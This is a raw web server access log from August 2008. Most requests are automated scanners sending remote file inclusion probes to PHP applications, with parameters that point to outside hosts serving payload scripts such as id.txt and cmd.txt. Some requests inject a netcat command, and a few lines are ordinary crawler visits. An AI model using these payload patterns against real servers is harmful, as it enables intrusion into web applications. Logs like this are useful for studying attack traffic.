216.75.35.118 - - [07/Aug/2008:01:43:28 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
203.88.121.128 - - [07/Aug/2008:01:44:45 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
203.88.121.128 - - [07/Aug/2008:01:44:46 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
203.98.87.14 - - [07/Aug/2008:01:45:07 -0500] "GET /logs/access_log.1203724800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
203.98.87.14 - - [07/Aug/2008:01:45:14 -0500] "GET /logs/access_log.1209600000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
74.53.39.34 - - [07/Aug/2008:01:46:09 -0500] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
74.53.39.34 - - [07/Aug/2008:01:46:09 -0500] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
212.50.0.218 - - [07/Aug/2008:01:47:58 -0500] "GET /logs/access_log.1213315200//convert/mvcw.php?step=1&vwar_root=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
212.50.0.218 - - [07/Aug/2008:01:47:58 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
212.50.0.218 - - [07/Aug/2008:01:47:59 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
131.107.65.41 - - [07/Aug/2008:01:48:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""MSR-ISRCCrawler"
66.249.70.131 - - [07/Aug/2008:01:49:00 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
131.107.65.41 - - [07/Aug/2008:01:49:18 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""MSR-ISRCCrawler"
208.82.247.252 - - [07/Aug/2008:01:50:49 -0500] "GET ///index.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
208.82.247.252 - - [07/Aug/2008:01:50:49 -0500] "GET /logs///index.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
58.25.217.217 - - [07/Aug/2008:01:52:17 -0500] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
58.25.217.217 - - [07/Aug/2008:01:52:20 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
58.25.217.217 - - [07/Aug/2008:01:52:22 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
58.25.217.217 - - [07/Aug/2008:01:53:14 -0500] "GET /logs/access_log.1206230400//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
66.225.218.2 - - [07/Aug/2008:01:53:39 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
66.225.218.2 - - [07/Aug/2008:01:53:39 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
74.200.202.55 - - [07/Aug/2008:01:55:45 -0500] "GET //newspublish/include.php?path[docroot]=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
74.200.202.55 - - [07/Aug/2008:01:55:45 -0500] "GET /logs//newspublish/include.php?path[docroot]=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
74.200.202.55 - - [07/Aug/2008:01:55:48 -0500] "GET /logs/access_log.1208044800//newspublish/include.php?path[docroot]=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
203.88.121.128 - - [07/Aug/2008:01:56:21 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
203.88.121.128 - - [07/Aug/2008:01:56:21 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
203.88.121.128 - - [07/Aug/2008:01:56:22 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
74.200.202.55 - - [07/Aug/2008:01:56:30 -0500] "GET /logs/access_log.1206230400//newspublish/include.php?path[docroot]=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
202.145.97.59 - - [07/Aug/2008:01:56:36 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
202.145.97.59 - - [07/Aug/2008:01:56:37 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
74.6.18.231 - - [07/Aug/2008:02:00:23 -0500] "GET /logs/access_log.1183075200 HTTP/1.0" 200 173193 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.88.121.128 - - [07/Aug/2008:02:00:28 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
208.82.247.252 - - [07/Aug/2008:02:00:54 -0500] "GET /logs///index.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
208.82.247.252 - - [07/Aug/2008:02:00:54 -0500] "GET ///index.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
58.25.217.217 - - [07/Aug/2008:02:01:20 -0500] "GET /logs/access_log.1208044800//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
58.25.217.217 - - [07/Aug/2008:02:01:21 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
58.25.217.217 - - [07/Aug/2008:02:01:26 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
212.97.132.101 - - [07/Aug/2008:02:01:46 -0500] "GET /logs//home.php?pagina=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 286 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:02:01:47 -0500] "GET //home.php?pagina=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 281 "-""libwww-perl/5.53"
58.25.217.217 - - [07/Aug/2008:02:01:59 -0500] "GET /logs/access_log.1206230400//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
212.97.132.101 - - [07/Aug/2008:02:02:02 -0500] "GET /logs//home.php?pagina=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 286 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:02:02:03 -0500] "GET //home.php?pagina=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 281 "-""libwww-perl/5.53"
208.82.247.252 - - [07/Aug/2008:02:08:42 -0500] "GET /logs/access_log.1216598400/e404.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
208.82.247.252 - - [07/Aug/2008:02:08:42 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.808"
208.82.247.252 - - [07/Aug/2008:02:08:42 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
203.88.121.128 - - [07/Aug/2008:02:08:51 -0500] "GET /logs/access_log.1208044800//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
74.200.202.55 - - [07/Aug/2008:02:11:20 -0500] "GET //newspublish/include.php?path[docroot]=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
216.75.35.118 - - [07/Aug/2008:02:11:39 -0500] "GET /logs/access_log.1214438400//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
74.6.18.231 - - [07/Aug/2008:02:12:17 -0500] "GET /logs/access_log.1162771200 HTTP/1.0" 200 257896 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.88.121.128 - - [07/Aug/2008:02:13:10 -0500] "GET /logs/access_log.1201824000//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
91.121.143.183 - - [07/Aug/2008:02:14:15 -0500] "GET /logs//?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.803"
91.121.143.183 - - [07/Aug/2008:02:14:15 -0500] "GET //?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
91.121.143.183 - - [07/Aug/2008:02:14:15 -0500] "GET /logs//?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.803"
91.121.143.183 - - [07/Aug/2008:02:14:16 -0500] "GET //?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
91.121.143.183 - - [07/Aug/2008:02:15:13 -0500] "GET /logs/access_log.1201737600//?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
91.121.143.183 - - [07/Aug/2008:02:15:13 -0500] "GET /logs/access_log.1201737600//?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
91.121.143.183 - - [07/Aug/2008:02:15:13 -0500] "GET //?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
91.121.143.183 - - [07/Aug/2008:02:15:13 -0500] "GET //?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
91.121.143.183 - - [07/Aug/2008:02:15:14 -0500] "GET /logs//?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.803"
91.121.143.183 - - [07/Aug/2008:02:15:14 -0500] "GET /logs//?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.803"
216.75.35.118 - - [07/Aug/2008:02:15:26 -0500] "GET /logs/access_log.1212883200//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
216.75.35.118 - - [07/Aug/2008:02:17:36 -0500] "GET /logs/access_log.1213315200//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
216.75.35.118 - - [07/Aug/2008:02:18:38 -0500] "GET /logs/access_log.1213142400//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.108.67.156 - - [07/Aug/2008:02:18:42 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://untouch-me.co.cc/info/bot/safe.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
89.108.67.156 - - [07/Aug/2008:02:18:42 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://geocities.com/raf_ly.com/id.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
89.108.67.156 - - [07/Aug/2008:02:18:43 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://untouch-me.co.cc/info/bot/safe.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
89.108.67.156 - - [07/Aug/2008:02:18:43 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://geocities.com/raf_ly.com/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
203.88.121.128 - - [07/Aug/2008:02:19:24 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
203.88.121.128 - - [07/Aug/2008:02:22:52 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
65.55.208.132 - - [07/Aug/2008:02:23:18 -0500] "GET /logs/access_log.1210291200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
217.160.200.228 - - [07/Aug/2008:02:27:28 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
217.160.200.228 - - [07/Aug/2008:02:27:28 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
77.90.20.2 - - [07/Aug/2008:02:27:43 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:02:27:48 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:02:27:53 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:02:27:54 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:02:27:55 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
213.33.84.163 - - [07/Aug/2008:02:33:16 -0500] "GET /logs/access_log.1206230400//home.php?sit=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
213.33.84.163 - - [07/Aug/2008:02:33:16 -0500] "GET //home.php?sit=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.33.84.163 - - [07/Aug/2008:02:33:16 -0500] "GET /logs//home.php?sit=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.33.84.163 - - [07/Aug/2008:02:33:47 -0500] "GET /logs/access_log.1203379200//home.php?sit=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
64.22.89.194 - - [07/Aug/2008:02:33:49 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://guildehades.fr/vnc/test.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
64.22.89.194 - - [07/Aug/2008:02:33:49 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://guildehades.fr/vnc/test.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
212.122.200.198 - - [07/Aug/2008:02:34:35 -0500] "GET /logs//////ask_password.php?dir=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
212.122.200.198 - - [07/Aug/2008:02:34:35 -0500] "GET /logs/access_log.1206230400//////ask_password.php?dir=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
212.122.200.198 - - [07/Aug/2008:02:34:38 -0500] "GET //////ask_password.php?dir=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
212.122.200.198 - - [07/Aug/2008:02:34:59 -0500] "GET /logs/access_log.1201564800//////ask_password.php?dir=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
82.49.28.184 - - [07/Aug/2008:02:36:33 -0500] "GET /logs/access_log.1212883200//config/dbutil.bck.php?confdir=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
82.49.28.184 - - [07/Aug/2008:02:36:33 -0500] "GET //config/dbutil.bck.php?confdir=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
82.49.28.184 - - [07/Aug/2008:02:36:34 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.808"
82.49.28.184 - - [07/Aug/2008:02:37:09 -0500] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
212.97.132.101 - - [07/Aug/2008:02:37:48 -0500] "GET /newspublish/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 295 "-""libwww-perl/5.53"
89.108.67.220 - - [07/Aug/2008:02:38:03 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:02:38:03 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
212.122.200.198 - - [07/Aug/2008:02:38:34 -0500] "GET /logs/access_log.1216598400/e404.php?DOCUMENT_ROOT=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
212.122.200.198 - - [07/Aug/2008:02:38:34 -0500] "GET /e404.php?DOCUMENT_ROOT=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
212.122.200.198 - - [07/Aug/2008:02:38:34 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:02:39:27 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:02:39:27 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:02:39:33 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
66.225.218.2 - - [07/Aug/2008:02:39:39 -0500] "GET /logs//home.php?pagina=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.225.218.2 - - [07/Aug/2008:02:39:39 -0500] "GET //home.php?pagina=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
63.251.141.233 - - [07/Aug/2008:02:43:22 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
63.251.141.233 - - [07/Aug/2008:02:43:27 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
66.224.152.230 - - [07/Aug/2008:02:44:28 -0500] "GET //home.php?pagina=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
66.224.152.230 - - [07/Aug/2008:02:44:36 -0500] "GET /logs//home.php?pagina=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
91.121.143.183 - - [07/Aug/2008:02:44:40 -0500] "GET /logs/access_log.1214438400//?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
91.121.143.183 - - [07/Aug/2008:02:44:41 -0500] "GET /logs/access_log.1214438400//?id=http://www.geocities.com/forensiq85/Insiderz/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
189.62.145.42 - - [07/Aug/2008:02:44:55 -0500] "GET /logs//home.php?pagina=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 298 "-""libwww-perl/5.800"
189.62.145.42 - - [07/Aug/2008:02:44:55 -0500] "GET //home.php?pagina=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 293 "-""libwww-perl/5.800"
77.90.20.2 - - [07/Aug/2008:02:45:38 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:02:45:43 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:02:45:49 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
89.108.67.156 - - [07/Aug/2008:02:46:04 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://h1.ripway.com/stevf57/id.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
89.108.67.156 - - [07/Aug/2008:02:46:05 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://h1.ripway.com/stevf57/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
200.203.121.1 - - [07/Aug/2008:02:46:12 -0500] "GET /logs//home.php?pagina=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
200.203.121.1 - - [07/Aug/2008:02:46:12 -0500] "GET //home.php?pagina=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
208.82.247.252 - - [07/Aug/2008:02:47:32 -0500] "GET //home.php?pagina=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
208.82.247.252 - - [07/Aug/2008:02:47:32 -0500] "GET /logs//home.php?pagina=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
212.97.132.101 - - [07/Aug/2008:02:48:07 -0500] "GET /logs/newspublish/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 300 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:02:48:07 -0500] "GET /logs/newspublish/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 300 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:02:48:07 -0500] "GET /newspublish/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 295 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:02:48:07 -0500] "GET /newspublish/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 295 "-""libwww-perl/5.53"
77.90.20.2 - - [07/Aug/2008:02:50:58 -0500] "GET /logs/access_log.1215216000//components/com_flyspray/startdown.php?file=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 349 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
77.90.20.2 - - [07/Aug/2008:02:50:58 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 322 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
77.90.20.2 - - [07/Aug/2008:02:50:58 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 327 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
77.90.20.2 - - [07/Aug/2008:02:50:58 -0500] "GET /logs/access_log.1216425600//components/com_flyspray/startdown.php?file=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 349 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
77.90.20.2 - - [07/Aug/2008:02:53:10 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:02:53:15 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:02:53:21 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
89.108.67.220 - - [07/Aug/2008:02:54:59 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:02:54:59 -0500] "GET ///vwar/backup/errors.php?error=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:02:55:00 -0500] "GET /logs///vwar/backup/errors.php?error=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
